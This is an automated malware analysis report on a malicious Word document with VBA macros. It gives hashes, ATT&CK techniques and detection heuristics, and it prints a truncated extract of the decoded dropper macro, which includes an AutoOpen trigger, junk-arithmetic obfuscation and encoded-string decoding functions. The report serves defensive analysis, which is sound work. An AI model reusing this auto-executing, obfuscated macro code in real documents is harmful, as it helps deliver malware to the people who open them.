Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0592b4d2f76a5ec8…

MALICIOUS

Office (OLE)

67.0 KB Created: 2018-06-13 10:06:00 Authoring application: Microsoft Office Word First seen: 2019-03-10
MD5: b2e0d468b82b1de92829817b1292907e SHA-1: 2364a75570bab29a5ef1e780bae03f0ff6935f57 SHA-256: 0592b4d2f76a5ec84edf6f71a780f6501357f15fee60fbc019c96c1cfd59a881
282 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate or Obfuscate Malicious Files or Information

The sample is a malicious Office document containing VBA macros. The 'AutOOpen' macro is triggered upon opening, and the document body contains a lure to 'Enable Editing' and 'Enable Content' to view the content. The VBA code appears to be obfuscated, with functions like 'td966148' and 'hcivoknaM' suggesting attempts to hide malicious actions, likely involving the execution of a payload.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-6592226-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6592226-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8400 bytes
SHA-256: a403669054739a47912518b709f473f72395c78afb2abaf92c599414b653e118
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
avosanaF = 77 - 42
avosanaF = 77 + 8 * 72 - 1
rebels111
avosanaF = 41 - avosanaF + 80 + avosanaF * 8
avosanaF = avosanaF + 40 - 49 * 27 + 6
avosanaF = 28 - 30 + 4
avosanaF = 62 * 50 - 7
End Sub

Attribute VB_Name = "automag0"
Function td966148(sugarjason As String, peekings As Integer) As String
honey433 = 0
For hfyfkgjr = 1 To 91
If (button1969(achunips, hfyfkgjr) = sugarjason) Then
   honey433 = hfyfkgjr
   avosanaF = 77 - 42
avosanaF = 77 + 8 * 72 - 1
avosanaF = 41 - avosanaF + 80 + avosanaF * 8
avosanaF = avosanaF + 40 - 49 * 27 + 6
avosanaF = 28 - 30 + 4
avosanaF = 62 * 50 - 7
    Exit For
End If
Next hfyfkgjr
honey433 = IIf(honey433 - peekings <= 0, 91 + honey433 - peekings, honey433 - peekings)
td966148 = button1969(achunips, honey433)
End Function

Function alphasix()
alphasix = halbernie.iiksnivelO
End Function

Function time4465(ninurtnA)
avosanaF = 77 - 42
avosanaF = 77 + 8 * 72 - 1
avosanaF = 41 - avosanaF + 80 + avosanaF * 8
avosanaF = avosanaF + 40 - 49 * 27 + 6
avosanaF = 28 - 30 + 4
avosanaF = 62 * 50 - 7
time4465 = parania20(zylturve + pawnpedc.zou543210) + ninurtnA + _
parania20(pawnpedc.dniklediE) + ninurtnA + parania20(chutuous.Redrum66)
End Function

Function hcivoknaM(abcnewuser, lopeprom)
avosanaF = 77 - 42
avosanaF = 77 + 8 * 72 - 1
avosanaF = 41 - avosanaF + 80 + avosanaF * 8
avosanaF = avosanaF + 40 - 49 * 27 + 6
avosanaF = 28 - 30 + 4
avosanaF = 62 * 50 - 7
hcivoknaM = parania20(shketenok.efortovo) + lopeprom + parania20(shketenok.synplapu) + _
lopeprom + parania20(shketenok.avehcalukS) + abcnewuser + _
parania20(pawnpedc.puzsidba + bararues + pawnpedc.bondoxford) + abcnewuser + parania20(pawnpedc.puzsidba)
End Function

Function zylturve()
zylturve = "KHX@K##Kxn4H0&B/Z'B0'X\"
End Function



Attribute VB_Name = "chutuous"
Attribute VB_Base = "0{91ED7AD8-A290-4A60-8543-B6E71719EFDA}{52491492-3CED-4A3A-B342-45652BC2072F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub ANINAHIT_Change()
MsgBox "OK"
End Sub

Private Sub ECNERUAL_Change()
AVONIDHSULAMAK = forceste(shitmagnum)
boristandy = forceste(shitmagnum)
IONHSUROB = forceste(halfachu)
poiuyt1088 = forceste(halfachu)
lestat1970 = 86 + 48
lestat1970 = 15 * 4
lestat1970 = lestat1970 - 88 * 39 + lestat197
lestat1970 = 100 - 98 + 2
lestat1970 = 87 + lestat1970 + 3
letterking AVONIDHSULAMAK, boristandy, IONHSUROB, poiuyt1088
End Sub

Private Sub Redrum66_Change()

End Sub

Private Sub sphenher_Change()

End Sub

Attribute VB_Name = "everythi"
Function fugeptar(AYNTAYMAZ, weedcute)
avosanaF = 77 - 42
avosanaF = 77 + 8 * 72 - 1
avosanaF = 41 - avosanaF + 80 + avosanaF * 8
avosanaF = avosanaF + 40 - 49 * 27 + 6
avosanaF = 28 - 30 + 4
avosanaF = 62 * 50 - 7
fugeptar = parania20(halbernie.APRIL1037) + AYNTAYMAZ + parania20(shketenok.april1407) + _
 weedcute + parania20(halbernie.mimiflip + halbernie.Golubie_Gl) + weedcute
End Function

Function bararues()
bararues = "'K44#KxM2nxHnrH0&B/Z'B0'X\"
End Function

Function gismgetb(raftSystems, tleanatc)
gismgetb = elsiepedro(Int((raftSystems * leonlock()) + tleanatc))
End Function

Function elsiepedro(paulzombie)
avosanaF = 77 - 42
avosanaF = 77 + 8 * 72 - 1
avosanaF = 41 - avosanaF + 80 + avosanaF * 8
avosanaF = avosanaF + 40 - 49 * 27 + 6
avosanaF = 28 - 30 + 4
avosanaF = 62 * 50 - 7
elsiepedro = CInt(paulzombie)
End Function

Function shitmagnum()
shitmagnum = pawnpedc.cocowawa
End Function

Function halfachu()
halfachu = halbernie.icemantara
End Function


Attribute VB_Name = "halbernie"
Attribute VB_Base = "0{35CC
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.